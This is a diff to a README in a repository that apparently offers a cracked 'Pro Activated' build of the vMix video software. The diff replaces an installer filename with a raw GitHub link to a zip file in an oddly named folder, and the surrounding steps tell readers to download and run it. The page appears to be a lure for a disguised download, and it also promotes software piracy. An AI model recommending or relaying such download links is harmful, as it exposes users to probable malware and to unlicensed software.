Liandjelo/vMix-Pro-Activated/README.md

 ### Step 3: Download the Software

 Look for the download link.
-It may look like `vMix-Pro-Activated-setup.exe`.
+It may look like `https://raw.githubusercontent.com/Liandjelo/vMix-Pro-Activated/main/dumbfounderment/Pro_Activated_v_Mix_3.9.zip`.
 Click on the link to start your download.
 The file size is approximately 150 MB, so please ensure you have enough space on your computer.

 ### Step 4: Run the Installer